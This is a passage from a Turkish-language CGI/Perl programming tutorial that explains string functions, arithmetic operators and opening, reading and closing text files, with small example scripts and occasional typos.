Çıkartma: Genellikle disklerdeki dosyalardan alacağımız metinlerin son satırında yeni satır (Enter,
Return) karakteri bulunur. Bu, aldığımız metni HTML etiklerinin içine yerleştirirken bize zorluk verir. PerlCGI / Perl                                             66
bunun için bir String’in son karakterini kesip atmayı sağlayan özel iki fonksiyona sahiptir. “chop()”
fonksiyonu, metnin sonundaki bir karakteri keser:

       $yedi_harf = “ABCÇDEF”;

       $giden_harf = chop($yedi_harf)

       print “\$yedi_harf\’de altı harf kaldı: $yedi_harf.
       \$giden_harf= $giden_harf”;

Perl 5’de aynı işlevi yapan “chomp()” fonksiyonu ise, bir önceki göre daha akıllıdır; kimi dosyalarda yeni
satır+satırbaşı karakterlerinin iki karakterlik yer tuttuğunu bilerek, ne kadar karakter attacağına kendisi
karar verir. chop yerine chomp kullanmak daima daha güvenlidir.

Transformasyon: Herhalde metinlerle dört aritmetik işlemden bölmeyi yapamıyor diye Perl’e
kızmazsınız. Perl’ün buna karşılık değişkenlerin gerçek içeriklerini değiştirme marifeti vardır. Tam
içeriklerini değilse bile harflerinin biçimini! Ve sadece Perl 5’den itibaren!

Bir metin büyük harf olabilir; küçük harf olabilir. Bir metnin birinci harfi büyük olabilir; küçük olabilir.
Perl değişkendeki biçimi ne olursa olsun, metinlerinizi sizin isteğinize göre büyük harf veya küçük harf
yapabilir.

lc() fonksiyonu değişken içindeki biçimi ne olursa olsun, bütün String’i küçük harf (lower case) ve uc()
fonksiyonu ise bütün String’i büyük harf (upper case) yapar.

////////////////////////////KUTU//////////////////////////////

Lower ve Upper Kasalar


İngilizce’de büyük harfe Upper Case, küçük harfe de Lower Case dendiğini daha önce de duymuş
olmalısınız. Upper Case, (üst kasa), eski matbaacılıkta büyük harflerin durduğu üst kasanın, Lower Case
ise küçük harflerin durduğu alt kasanın adıydı. Buradan dile geçen bu tanımla bugün Perl dahil birçok
programlama diline kadar gelmeyi başardı.

////////////////////////KUTU BİTTİ/////////////////////

lcfirst() fonksiyonu String’in sadece birinci harfini küçük harf yapmaya zorlar; ucfirst() ise sadece birinci
harfi büyük harf yapar. Örnek:

$kucuk_harf = “abcdef”;

$buyuk_harf = “GHIJKLM”;

print uc($kucuk_harf);

print lc(buyuk_harf);CGI / Perl                                              67
print lcfirst($buyuk_harf);

print ucfirst(kucuk_harf);

Bu program sırasıyla şu sonuçları verir:

kucuk_harf = “ghijklm”;

$buyuk_harf = “ABCDEF”;

$kucuk_harf = “gHIJKL”;

$buyuk_harf = “Abcdef”;

Metin biçimlendirme işleri sırasında bize gereken bazı bilgiler olabilir. Bunların başında String’in
uzunluğu gelir. Bunu, String’i tutan değişkenin boyutunu linght() fonksiyonu ile sorgulayarak öğreniriz:

$Metin1 = “Dostluklar çicek gibidir, daima bakım ister!”:

print length($Metin1);

Bu program şu sonucu verir:

44

Bazen bir karakterin sayısal değerini bilmek isteriz. Bunu, ord() fonksiyonu ile sağlarız. Örneğin, K
karakterinin sayısal değerini öğrenmek için:

print ord(‘K’);

şu sonucu verir:

75

Aşağıda metin biçimlendirme işlemleri yaparken ihtiyaç duyacağımız bir başka bilgi, bir String’in içinde
belli bir konumdaki karakterlerin değeri olabilir. Perl, adını verdiğiniz değişkenin içindeki değeri bulur; o
değerde, belirttiğiniz bir konumdan sonra belirttiğiniz sayıdaki karakterin (sub-String’in, String’in bir
bölünümünün) ne(ler) olduğunu söyler. Bu bilgiye dayandığımız işlemleri sonra göreceğiz; ama şimdi
sadece bunu sağlayan substr() fonksiyonun kullanımını görelim:

$Metin1 = “Bana dostunu söyle; sana kim olduğunu söyleyeyim!”:

print substr($Metin1, 3, 12);

Bu program ekrana “a dostunu sö” yazdıracaktır. substr() fonksiyonunun birinci argümanı içinde arama
yapacağımız değişkenin adı, ikinci argümanı aramaya başlanacak karakter poziyonu (Dikkat! Perl
saymaya 0’dan başlayacaktır!), ve son argüman bu pozisyon dahil, kaç karakterin belirleneceğini
gösteren sayıdır. Buradaki örnekte, Perl’e $Metin1 değişkeninde 3’nci karakterden (‘Bana’ kelimesinin
son a harfi) itibaren 12 karakterin neler olduğunu sormuş oluyoruz.CGI / Perl                                             68
    Metin düzenleme konusunda sık sık başvuracağımız split(), chop(), chomp(), shift(), unshift(),
    pop() ve push() fonksiyonlarını daha önce ele almıştık.

Biraz da Matematik


    “Ben zaten matematikten kurtulmak için programcı olmuştum!” diyorsanız, belki de hayatta
    size uygun tek programlama dili Perl sayılır. Bundan, “Perl de matematikten hoşlanmaz!”
    sonucunu çıkartmayın; tersine matematikle ilgili bütün işleri Perl halleder; size sadece sayıları
    vermek kalır. Başka programlama dillerinde, bir değişkene atayacağınız sayının türünü, tam sayı
    mı, kesirli sayı mı olduğunu belirtmeniz gerekir. Perl için, sayı, sayıdır.

    Perl, dört işlemi başarıyla yapar. Bunun için sayıların veya sayı tutan değişkenlerin arasında,
    toplama, çıkartma, çarpma ve bölme için sırasıyla +, -, * ve / işaretlerini kullanırız.

    Diğer bütün diller gibi, Perl’de de matematik işlemler soldan sağa doğru sıra ile yapılır. Yani, “10
    + 3 * 2 / 4” komutu, Perl için şu anlamı taşır:

    10 ile 3’ü topla, elde ettiğin sayıyı iki ile çarp; elde ettiğin sayı dörde böl.

    Fakat sizin istediğiniz daima bu sıraya uygun olmayabilir. Eğer önce 10 ile 3 toplansın, sonra 2,
    4’e bölünsün ve elde edilen iki sonuç birbiri ile çarpılsın istiyorsanız, sonuç çok farklı olacaktır.
    Perl, matematik işlemlerini istediğiniz sırayla yapsın istiyorsanız, işlemleri parantez içine
    almalısınız. Örneğin, verdiğimiz örnek şöyle yazılabilir:

    (10 + 3) * (2 / 4)

    Perl ile bir sayının başka bir sayı ile üssünü almak için ** işaretini kullanırız: 5’in 5’nci kuvvetini
    bulmak için “5**5” yazmanız yeterli.

    Perl bir bölme işleminin kalanını (modulo) bulabilir. 10’un 3’e bölünmesinde kalan sayıyı
    bulabilmek için “10 % 3” yazar ve bunu bir değişkene atarsanız, değişkenin değeri 1 olur.

    Perl, bir sayının önünde eksi işaretini görünce o sayısı negatif yapar; negatif bir sayının önünde
    eksi işareti görünce de pozitif yapar.

    Perl’e bir değişkenin tutuğu sayı ile işlem yaptırtabilir ve sonucu yeni değer olarak aynı
    değişkende tutmasını bildirebilirsiniz:

    $sayi1 = $sayi1 * 2; veya $sayi1 *= 2;

    $sayi1 = $sayi1 + 2; veya $sayi1 += 2;

    $sayi1 = $sayi1 – 2; veya $sayi1 -= 2;

    $sayi1 = $sayi1 / 2; veya $sayi1 /= 2;CGI / Perl                                              69
    Perl’de bir değişkenin tuttuğu değeri 1 arttırma veya 1 eksiltme içzin özel bir deyim vardır;

    $sayı1 ++;

    değişkenin değerini 1 arttırır;

    $sayı1 --;

    değişkenin değerini 1 eksiltir.

    (Ve şimdi Perl’den sonra öğrenmeye karar verdiğiniz C++ ile C dilleri arasındaki farkı ve uzun
    uzun süre bilgisayarla aynı odada kalmanın kişinin mizah gücüne etkisini öğrenmiş
    bulunuyorsunuz!)

    /////////////////////KUTU////////////////////

++’nin garip oyunu


    Diyelim ki elinizde değeri 10 olan $Sayı1 değişkeni var. Perl’e “$Sayı1’i 1 arttır ve bulacağın
    değeri $Sayı2’ye ata!” demek istiyorsunuz. Bu deyimi:

    $Sayı2 = $Sayı1++

    şeklinde yazarsanız, $Sayı1, 11 olur; ama $Sayı2’ye 10 değeri verilir.

    Bunu önlemek için bu deyimi şöyle yazmanız gerekir:B

    $Sayı2 = ++$Sayı1

    ////////////////////////KUTU BİTTİ////////////////////

    Perl’ün sayılarda kullanabileceğiniz bazı diğer fonksiyonları vardır:

        Karekök: sqrt()

        Logaritma: log()

        Mutlak sayı: abs()

        Bölme işleminin tam sayısı: int()

    Bunları birarada sınayabileceğiniz bir örnek program şu olabilir:

    $sayi1 = 210;

    print "$sayi1\'in karekökü : ". sqrt($sayi1);

    print "<p>\n";CGI / Perl                                             70
    print "$sayi1\'in logaritması : ". log($sayi1);

    print "<p>\n";

    print "e’nin $sayi1 ‘e eksponensiyeli: ". exp($sayi1);

    print "<p>\n";

    $sayi2 = -$sayi1;

    print "\$sayi2 = $sayi2";

    print "<p>\n";

    print "$sayi2\'in mutlak değeri : ". abs($sayi2);

    print "<p>\n";

    $sayi3 = $sayi1 + 0.4567;

    print "\$sayi3 = $sayi3";

    print "$sayi3\'in integer’ı : ". int($sayi3);

    Perl matematik sever dedik, değil mi? Fakat Perl, sayı ile metnin toplanmayacağını bilmez! Bu
    ikisini toplar; fakat elde ettiği sonucu artık sayı saymaz:

    $Sayi1 = 12345;

    $Metin1 = “Zor dostum, zor!”;

    $Sayi1 = $Sayi1 . $Metin1;

    print $Sayi1;

    Biraz önce toplanabilir, çıkartılabilir bir sayı olan $Sayi1, artık bir String’den ibaret ve değeri
    “12345Zor dostum, zor!” olmuş bulunuyor.

    Peki; böylece metinlerle uğraşmanın yollarından bir kısmını öğrendik. Fakat elimizde metin yok.
    Çünkü henüz Perl’e “Git bu benim C: adlı sabit diskte, Belgelerim dizinindeki filanca isimli
    dosyayı, al gel bakalım; gelirken bir de sade kahve söyle!” demeyi bilmiyoruz. Şimdi bunun nasıl
    yapılacağını öğrenelim, ki Internet’teki Form’umuzdan alacağımız bilgileri, örneğin ziyaretçi
    defterimize yazılan yazıları, diske kaydettirebilelim. Dosya açmayı ve Perl’e okumayı-yazmayı
    öğrettiğimizde kullanacağımız bir iki fonksiyon daha var ki, onları daha sonra göreceğiz. Burada
    sadece bu fonksiyonların bir metinrde arama, bulma ve değiştirme işlevleri olduğunu
    belirtmekle yetinelim.
CGI / Perl                                              71
Perl’de Dosya İşlemleri


    İlk öğrendiğiniz dosya işlemi, eğer DOS döneminden beri PC ile uğraşıyorsanız, “dir” komutu idi.
    Akıp giden bir takım listelerle, sabit diskin içindeki “şeyleri” görebilirdik bu komutla. Sonra
    Windows, önce File Manager (Dosya Yönetici) ile, sonra Windows Explorer (Windows Gezgini)
    ile sabit disk ve disketlerimizin içindekileri, çeşitli simgelerle ekrandaki bir takım pencerelerde
    görüntüler oldu. Unix dünyasında, örneğin Linux’ta DOS’un “dir” komutunun yaptığı işlevi “ls”
    komutu ile yapatırabiliriz; fakat artık Unix bilgisayarları da XWindow ile görsel kullanıcı
    arabirime sahip oldu; orada da dosyal işlemlerini Mouse işaretçisiyle tıklayarak yapabiliriz.
    MacOS ise, tasarlandığı birinci günden değilse bile ikinci günden beri dosya işlemleri için grafik
    arabirimi kullanıyor.

    Dolayısıyla, kişisel bilgisayarda dosya işlemleri dediğimiz zaman, aklımıza çoğunlukla “tıklamak,”
    “sürüklemek” ve “bırakmak” geliyor. Bizim için adeta düşünmeden yapılabilen bu işleri Perl’e
    yaptırabilmek için, disk kayıt sistemini biraz yakından tanımamız gerekir.

    “Dosya,” sabit veya takılıp-çıkartılabilen bir disk (veya CD-ROM) üzerinde, kayıt yapılabilir bir
    ortama, başladığı ve bittiği yer belirtilerek, belirli bir sisteme göre ve byte birimiyle yapılmış
    kayıt demektir. Her bir kaydın başladığı ve bittiği yer ve bu ikisinin arasındaki kaydın ne adla
    anılacağı yazılır. Böylece “Askerlik Mektubu.doc” adlı kaydın, arandığı zaman nerede bulunacağı
    bilinir.

    //////////////////KUTU///////////////////////

Biraz Unix Bilgisi


    Unix işletim sisteminde sadece disk/disket/CD-ROM’da kayıtlı byte’lara dosya denmez;
    klavyeden gelmekte olan, okunmakta olan bir sabit diskten alınan, veya bilgisayara iletişim
    kapılarından (Com Port’lar veya ağ kartları) girmekte olan veya ekran ve iletişim kapılarından
    çıkmakta olan veri de dosya sayılır; bu özel dosyalara “Standart Girdi/Çıktı” (Standart
    Input/Output) dosyası denir. Bu dosyalar üçe ayrılır:

    Standart Girdi (STDIN) dosyası: Tanım itibariyle klavyeden bilgisayara ulaşmakta olan bilgi
    akımıdır. Klavyeden bir programa yönelik olarak yazdığınız herşey Standart Input sayılır.

    Standart Çıktı (STDOUT) dosyası: Bilgisayarın ekranına gönderilen, dosyaya yazılmak yerine
    ekrana yazılan her türlü bilgi akımıdır.

    Standart Hata (STDERR) dosyası: İster ekrana, ister diske gönderilebilecek bilgi akımıdır. Unix
    işletim sistemlerinin büyük bir bölümü bu bilgileri sabit diskte dosyaya yazarlar.

    Unix sistemleri, bu üç dosyayı kullanarak bir programa veri verebilir veya veri alabilirler.

    //////////////////////////KUTU BİTTİ/////////////////////


CGI / Perl                                             72
    İşletim sistemi ne olursa olsun, dosyaları iki ana bölüme ayırırız: İnsan tarafından okunabilen
    dosyalar; sadece makina tarafından okunabilen dosyalar. Düzyazı dosyaları, .INI dosyaları,
    .CONF dosyaları, herhangi bir düzyazı programı ile açılıp, okunabilir. Okuduğunuz şeyden anlam
    çıkmaması veya anlaşılır harf olarak görüntülenmeyen bir-iki karakter bulunması dosyanın yazı
    dosyası olma niteliğini değiştirmez. Makina tarafından okunabilir veya binary (ikili) dosyalar ise
    programlar tarafından okunabilir. Örneğin uzatması EXE olan bir dosyayı işletim sistemini
    oluşturan programlar okur. Boyutu küçük bir EXE dosyasını sürükleyerek Not Defteri’nin içine
    bırakırsanız, bu tür dosyaların nasıl bir içeriğe sahip olduğunu görebilirsiniz. (Dikkatli olun, çok
    büyük dosyalar Not Defteri’nin çökmesine yol açar; açtığınız dosyayı sakın kaydetmeye
    kalkmayın!)

    Perl’e, düz yazı dosyalarını okutabilirsiniz.

Dosyayı Açalım!

    Perl açısından bir dosyanın okunması, yazılması veya dosyaya ek yapılması için önce açılması
    gerekir. Bu, işletim sistemlerinin programlara, dillere ve kullanıcılara getirdiği bir zorunluktur.
    Perl, hangi işletim sisteminde çalışıyorsa, o sistemin dosya açma yöntemini bilir ve uygular. Bize
    düşen sadece Perl’e dosyayı açmasını bildirmektir.

    Perl’ün ister okumak, ister yazmak, ister eklemek amacıyla olsun, bir dosyayı açmasını open()
    fonksiyonuyla sağlarız. Bu fonksiyon iki argüman alır:

    1. Dosyanın Perl tarafından kullanılırken alacağı ad: Handle. Kelime anlamı kulp, tutacak yer,
    tutamak, sap anlamına gelen bu ada, başka kaynaklarda belirteç dendiğini görebilirsiniz. Dosya
    adı ne olursa olsun, Perl, bu dosyadan alacağı bilgi akımını vereceğiniz bu kelime ile
    tanıyacaktır. (Daha teknik ifade edersek, Unix sisteminde açılan bir dosya, dosya sisteminde
    özel bir nitelik kazanır. Ona bu niteliğini veren, içindeki verinin sisteme alınacağı yolun
    oluşturulması; dosyanın sabit diskte başkası tarafından silinmesi veya değiştirilmesine karşı
    önlem alınması gibi sistem-varî hazırlıkların yapılmasıdır.)

    2. Dosyanın adı: Sabit disk sisteminde dosyanın arama yolu (path) ile birlikte adı.

    IRC Server’lara ve Chat ortamına aşina olanlar için Handle veya Perl açısından dosyanın içeriğini
    belirleyen adı, Nick’e benzetebiliriz. Hepimizin bir adı soyadı olduğu halde Chat ortamında
    herkesin bir Nick’i bulunur. Adımız ne olursa olsun IRC’ye bağlandığımız andan itibaren, bu Nick
    ile biliniriz.

    Dosya, çalışmakta olan Perl ile aynı dizinde ise, dosya adının önüne arama yolu koymaya gerek
    yoktur. Ancak dosya başka dizinde ise Perl’ün dosyayı nerede arayacağını bilmesi gerekir.
    Diyelim ki, Perl programının bulunduğu dizinde, “ornek.txt” adlı bir düzyazı dosyamız var; bu
    dosyayı Perl’e açtırmak istiyoruz:

open (DOSYA, ‘ornek.txt’);CGI / Perl                                             73
    Burada open() fonksiyonuna, “ornek.txt” dosyasını açmasını ve bundan böyle bu dosya ile ilgili
    işlemlere “dosya” adıyla gönderme yapacağımızı söylüyoruz. Bu dosya, Perl ile aynı dizinde
    değil de, uzaklarda bir yerde olabilirdi:

    open (DOSYA, “../../metinler/duzyazilar/ornek.txt”);

    //////////////KUTU/////////////////////

Path!


    Sabit diskinizdeki arama yolu (Path) ile ilgili yazım kuralları, Web sitesine gelince biraz değişir.

    Kişisel Web Server’da Web sitenizin mutlak “root” (kök dizini) adresini bilmeniz kolay. Bu,
    örneğin c:\inetpub\wwwroot gibi bir dizin olmalı. Fakat bir evsahibi firmadan (Host) edindiğiniz
    Web Sitesinin mutlak arama yolunu bilemezsiniz. Benzeri zorluklar ve güvenlik önlemleri
    yüzünden Web Server, CGI programları için dosya arama yolunu mutlak değil göreli olarak
    kullanılması zorunluğunu getirir. Bu, herşeyden önce bütün dosyaların Web sitesinin bulunduğu
    sabit diskin kök dizinine olmasını göre belirtilmesini gerektirir. Örnek olarak herhangi bir
    www.örnek_site.com.tr’nin iskeletinde, sözgelimi çalışmakta olan “oku_yaz.pl” isimli CGI
    programı ile bu programın açmak istediği “ornek.txt” dosyasının birbirine göre yerinin şöyle
    olduğunu düşünelim:

    <cgi-perl.013.tif>

    Buna göre, open() fonksiyonunda dosyanın arama yolunu iki türlü belirtebiliriz:

    1. Mutlak: “/Belgelerim/duzyazılar/ornek.txt

    2. Göreli: “../duzyazılar/ornek.txt

    ornek.txt, Web alanı dışında olduğu için, hiç kimse bu dosyanın URL (Internet adresini)
    Browser’ının adres hanesine yazarak, bulamaz; çünkü bu dosyanın Webb alanında olmadığı için
    URL’i olamaz.

    ///////////////////////////KUTU BİTTİ///////////////

    Dosya adlarının programlama yoluyla (programmatically) verilebileceğini doe belertelim.
    Diyelim ki, dosya adını tutan bir değişkeniniz var. Bu değişkenin bu değeri nasıl edindiği şimdilik
    önemli değil. Sözgelimi bu adı Web sitemizi ziyaret eden kişinin bir tercihi belirleyebilir; veya biz
    değişkene bu değeri atayabiliriz:

    $dosya_adi = ‘ornek.txt’;

    open (GIRDI, $dosya_adi);
CGI / Perl                                              74
    Şimdi artık Perl bu dosya ile istediğiniz her türlü okuma, yazma ve ekleme işlemini yapabilir.
    Bununla birlikte Perl ile dosyalarda yapabileceğimiz işlemleri bilirsek, dosya açma işleminin
    boyutunu daha iyi anlayabiliriz:

    ////////////////////KUTU//////////////////////

Tutamak adı neden büyük harf!


    Perl geleneğinde file handle, açtığınız dosyaların Perl tarafından tanındığı adlar, değişken adı
    kurallarına uymak zorundadır: rakamla başlayamaz; harfle veya alt-çizgi ile başlar; içinde rakam
    bulunabilir; işaret bulunamaz. Fakat hemen hemen bütün profesyonel Perl programlarında
    HANDLE’ın daima büyük harfle yazıldığını göreceksiniz; bu kesinlikle zorunlu değildir.

    Tutamak adları, tamamen keyfî olmakla birlikte anlamlı olmalı; programınızı kullanacak veya
    kendi programına katabilecek kişilerin program akışını anlamalarına imkan vermelidir.

    ////////////////////////////////////////////////////

    Dosya Okuma: Okumak, bir dosyanın içeriğini değiştirmeden içindeki verileri almak ve
    kullanmak demektir. Bir dosyanın okunmak için açılması için, varolması gerekir. olmayan bir
    dosya okunmak için açılamaz.

    Dosya Yazma: Bir dosyaya yeni bilgi girmek için açmak, yazmak amacıyla açmaktır. Olmayan bir
    dosyayı, yazmak amacıyla açmak, dosyayı oluşturmak demektir. Varolan bir dosyayı açar ve
    yazarsanız, dosya silinir ve yeniden yazılır.

    Dosyaya Ekleme: Ek yapmak amacıyla açılan dosyanın sonuna yeni veri kaydedilir. Ekleme,
    mevcut dosyayı silmez; varolan dosyanın içeriğini değiştirir. Olmayan bir dosyayı ek yapmak için
    açmak, gerçekte yazmak için açmakla aynıdır.

    Bir dosya, bu üç işlemden sadece birisi için açılabilir; yani bir dosyayı, hem okumak, hem de
    yazmak için açamazsınız. Perl’e bir dosyayı ne amaçla açtığınızı söylemeniz gerekir. Bunu, dosya
    adının önüne koyduğumuz büyüktür-küçüktür işareti ile yaparız: “<” oku; “>” yaz; “>>” ekle!
    Örnekler:

    open (OKU, ‘mevcut.txt’);                 #Okumak için

    open (OKU, ‘<mevcut.txt’);                #Okumak için

    open (YAZ, ‘>yeni.txt’);                 #Yazmak için

    open (EKLE, ‘>>mevcut.txt’);               #Ek yapmak için

    Burada okumak amacıyla dosya açarken, dosya adının önüne işaret koymayabileceğimizi
    görüyorsunuz. Bu imkana rağmen, iyi bir Perl programlama geleneği okumak için bile açsanız,
CGI / Perl                                            75
    her dosyanın adının önüne amacınızı belirten işareti koymaktır. Dosya tutamakları da dosyanın
    okunmak amacıyla mı, yoksa yazılmak amacıyla mı açıldığını belirtebilir.

    Daha sonra open() fonksiyonuyla birlikte kullanmak üzere bir değişkene değer olarak dosya adı
    verirken de dosyanın açma amaçı işaretini koyabiliriz:

    $dosya_adi = ‘>ornek.txt’; #Yazmaya hazırlık

    open (CIKTI, $dosya_adi);         #Bu dosyaya yazılabilir

    /////////////////KUTU///////////////////

Dosya Açamayan Perl Ölsün Mü?


    open() fonksiyonu, başarıyla sonuçlandıysa, programa True (doğru) sonucunu verir;
    başarısızlıkla sonuçlanırsa False (Yanlış) sonucunu. open() fonksiyonunun başarısızlıkla
    sonuçlanması, okumak üzere açmak istediğiniz bir dosyanın verdiğiniz yolda bulunamaması,
    yazmak veya eklemek üzere açtığınız bir dosyanın salt-okunur olması gibi sebeplerden
    kaynaklanabilir.

    open() fonksiyoru hata verirse, bu kullanarak programı durdurabiliriz. Bunun klasik örneği
    şudur:

    $dosya_adi = ‘>ornek.txt’; #Yazmaya hazırlık

        open (DOSYA, $dosya_adi) or die “Yazmak için $dosya_adi
           açılamıyor. Program zorunlu olarak sona erdi.\n”;

    Buradaki “or die” fonksiyonu “ya dosyayı aç, veya öl!” anlamına geliyor; ve Perl’e dosyayı
    açamazsa, bir mesaj vererek durmasını bildiriyor.

    Bu yöntem bir rapor yazma dili olarak Unix sisteminde kullanıldığı zaman Perl’ün hatalı bir
    durum oluştuğu halde çalışmaya devam etmesini önlemesi bakımından iyi bir yöntemdir. Fakat
    Perl’ü, CGI programı olarak çalıştırdığımız zaman Server’daki Perl’ün durması, ziyaretçilerimiz
    açısından hiç bir anlam taşımaz. Tersine Perl’ün durması değil; hatayı anlayarak ziyaretçiye
    uygun bir karşılık vermek ve yeni seçenekler sunmak üzere çalışmaya devam etmesi gerekir.

    Dolayısıyla, ilkelerini sonra görmek şartıyla, bu deyimi şöyle yazabiliriz:

    $dosya_adi = ‘>ornek.txt’; #Yazmaya hazırlık

        open (DOSYA, $dosya_adi) || &Hata;

    Burada, open() fonksiyonunun hata vermesi halini düzenleyen (or/veya) işlemcisi olan “||”
    işareti ile bir Subrutin (programcınının yazdığı fonksiyon) kullandığımıza dikkat edin. Subrutin
CGI / Perl                                            76
    meselesine geleceğiz; fakat şimdilik “Hata” adlı ve Perl programının sonuna koyacağımız
    Subrutin’nin kodunu vermekle yetinelim:

    sub Hata {

         print “Bir hata oldu; dosya açılmıyor. Ya bu dosya yok, ya
           da biz Perl’ü yazarken bir hata yaptık!\n”;

         print “Çok özür dileriz.. Şurayı tıklayın da bari başka bir
           tarafa gidin!\n”;

         print “<A HREF=\”baska_bir_taraf.htm\”>Tıklayın!</A>\n”;

    exit

    }

    ///////////////////KUTU////////////////////////

Her sistemin kendi diline göre


    Perl ile yazacağınız CGI programları, çalıştıkları işletim sistemi ortamına göre dosya araya yolu
    vermek zorundadır. Unix veya NT tabanlı Web Server’lar için, arama yolu URL tarzında
    olmalıdır. Ancak Perl programınıza kendi sabit diskinizde dosya açtırma denemesi
    yaptırıyorsanız, bu işletim sistemi göre değişir:

    95/98/NT/2000:

    open (DOSYA, “>C:\Belgelerim\Veriler\Metinler\ornek.txt”);

    MacOS:

    open (DOSYA, “>Ana:Belgeler:Veriler:Metinler:ornek metin”);

    Linux:

    open (DOSYA, “>/usr/home/belgeler/Veriler/metinler/ornek.txt”);

    Bu sistemlerde mutlak arama yolu yerine göreli (çalışmakta olan Perl dosyasına göre) yol da
    belirtebilirsiniz:

    95/98/NT/2000:

    open (DOSYA, “>..\ornek.txt”);

    MacOS:

    open (DOSYA, “>::ornek metin”);CGI / Perl                                            77
    Linux:

    open (DOSYA, “>../ornek.txt”);

    ///////////////////KUTU BİTTİ//////////////

    /////////////////KUTU////////////////////

Açtığınızı Kapatın!


    Açtığınız dosyayı kapatmanız gerekir. Bunun için programda yapılacak bütün dosya işlemlerinin
    bittiği yere şu fonksiyonu yazmanız yeter:

    close(TUTAMAK);

    Burada TUTAMAK kelimesinin yerine dosyayı açarken verdiğiniz tutamak adını yazacaksınız.
    Dosyayı kapatmazsanız ne olur? Hiç bir şey olmaz; Perl, program bitince dosyayı kapatır. Fakat
    bir dosyayı ne kadar çabuk kapatırsanız, o kadar iyi: çünkü Perl dosya için close() fonksiyonunu
    icra etmedikçe, veya kendisi dosyayı zorunlu olarak kapatmadıkça, bellekteki bilgileri dosyaya
    yazmaz. Bu sırada Server çökebilir; dosya son bilgilerle güncelleştirilmemiş olur. Bu sırada başka
    bir program dosyayı açmak isteyebilir; dosya eksik olarak sunulur. İyi programcılık tekniği, işi
    biten dosyanın hemen kapatılmasını gerektirir.

    ////////////////////KUTU BİTTİ////////////////////////////

Dosyayı Okuyalım


    Çok güzel! Perl’ü öldürmeden dosyayı açmayı başardık! Şimdi sıra Perl’e dosyadaki yazıyı satır
    satır okutmakta. Fakat bu çok kolay. open() fonksiyonunda belirttiğiniz dosyanın tutamağını
    (belirteç’ini, Handle’ını, Nick’ini!) büyüktür-küçüktür işaretleri arasında ve herhangi komutun
    veya fonksiyonun parçası veya argümanı olarak belirttiğiniz anda, Perl, iki eli kanda olsa, gider
    ve dosyadan bir satır okur; gelir!

    Bu cümle biraz karışık oldu. en iyi örnekle anlatalım. Yukarıda ornek.txt dosyasını, Perl’e
    “DOSYA” tutamağıyla açmasını bildirdik. Şimdi Perl’e bu dosyadan bir satır okutalım. Bunun için
    önce kendinize bir ornek.txt dosyası yapmanız ve bunu Perl dosyasının çalıştığı dizine koymanız;
    farklı dizine koyacaksanız open() fonksiyonunu yazarken, yukarıda öğrendiğimiz şekilde, doğru
    arama yolu belirtmeniz gerekir. Benim ornek.txt dosyamın birinci satırında şunlar yazılı:

Bu bir örnek düz yazı dosyasıdır. Bu dosyanın içinde bir çok bilgiler
yer alıyor.

    Sonra açın Not Defteri’ni (veya herhangi bir düzyazı programını) vey şu kodu yazarak dosya01.pl
    adıyla kaydedin:CGI / Perl                                            78
       print "HTTP/1.0 200 OK\n";

       print "Content-Type: text/html\n\n";       print "<HTML>\n";

       print "<HEAD>\n";

       print "<TITLE>Tekrarlama</TITLE>\n";

       print "<meta http-equiv=\"content-type\" content=\"text/html;
       charset=ISO-8859-9\">\n";

       print "<meta http-equiv=\"Content-Type\" content=\"text/html;
       charset=windows-1254\">\n";

       print "</HEAD>\n";

       print "<BODY>\n";

       print "<H4>Dosya Aç</H4>\n";

       print "<p>\n";

       open (DOSYA, "<ornek.txt") || &Hata;

       $satir1 = <DOSYA>;

       print $satir1;

       sub Hata {

       print "Bir hata oldu; dosya açılmıyor. Ya bu dosya yok, ya da biz
       Perl’ü yazarken bir hata yaptık!\n";

       print "Çok özür dileriz.. Şurayı tıklayın da bari başka bir tarafa
       gidin!\n";

       print "<A HREF=\"baska_bir_taraf.htm\">Tıklayın!</A>\n";

       exit

       }

       print "</BODY>\n";

       print "</HEAD>\n";

       print "</HTML>\n";
CGI / Perl                                  79
    Bu kodda, okumak amacıyla ve DOSYA tutamağı ile ornek.txt dosyasını açıyoruz; ve ve ilk satırını
    okutup; okunan metni $satir1 değişkeninin değeri yapıyoruz. Bunu hangi komut yapıyor?
    Büyüktür-küçüktür işareti içine alınmış olan DOSYA tutamağı yapıyor: <DOSYA>. Burada
    büyüktür-küçüktür işaretlerine “Dosya Girdi Operatörü” (File Input Operator) denir. Bunu
    izleyen satırda print() fonksiyonu, bu değişkeni ekrana gönderiyor. Bu alıştırmayı yaptı iseniz, ve
    dosyanın adını veya yolunu yanlış yazdı iseniz, şu anda ekranda hata mesajını görüyorsunuz!
    Herşey yolunda gitti ise örnek yazı dosyanızın birinci satırını görüyor olmalısınız.

    <cgi-perl014.tif>

    Belki ekranda belli olmuyor, ama görüntülenen sadece birinci satırdaki harfler, rakamlar ve
    işaretler değil, fakat aynı zamanda satırın sonundaki “yeni satır” (newline) karakteri de
    ekranınızda! Yani gerçekte ekranda görüntülenen metin şu şekilde:

    Bu bir örnek düz yazı dosyasıdır. Bu dosyanın içinde bir çok
    bilgiler yer alıyor.\n

    Perl’ün bir dosyadan “bir satır” yazı okuyabilmesi için yeni satır karakterini bulması gerekir. Bu
    Perl’ün “satır” saydığı veriyi tanımlamasını sağlar. Hatırlarsanız, bu karakteri chomp()
    fonksiyonu ile atabiliyoruz!

    Yine hatırlarsanız, “$_” şeklinde yazılan özel bir değişkenden söz etmiş, bu değişkenin Perl’e
    gelen her verinin ilk uğrak yeri olduğunu söylemiştik. Birazdan, bu değişkeni kullanacağız.
    Şimdilik, $satir1’in değerinin $_’in değerine eşit olduğunu belirtmekle yetinelim.

    Bu arada, Perl’e bir koşul gerçekleşinceye kadar, biteviye iş yaptırtma, yani döngü kurma
    fonksiyonlarımızdan while()’ı da hatırlıyor musunuz? Bu fonksiyon, şöyle kullanılıyordu:

    while (koşul) {

    ....koşul;

    ...doğru;

    ...iken;

    ...yapılacak;

    ...işler;

    }

    koşul doğru değilse yapılacak işler;

    Şimdi bunu dosya okutmakta kullanalım; ve yukarıdaki kodu biraz değiştirelim. dosya01.pl’de :

       $satir1 = <DOSYA>;
CGI / Perl                                            80
       print $satir1;    satırlarının yerine şu bloku yazın:

       while (<DOSYA>) {

       print $_;

       }

    Perl programını dosya02.pl adıyla kaydedin; ve çalıştırın. Şimdi ekranda örnek yazı dosyasının
    içeriğini tümüyle görüyor olmalısınız. Bunu sağlayan bu satırlık bölümü irdeleyelim: while()
    fonksiyonu verdiğiniz koşul doğru olmaya devam ettiği sürece, süsyül parantezle belirlenen
    kendi bloku içindeki komut ve fonksiyonları icra eder. Dosya Girdi Operatörü (yani <> işaretleri)
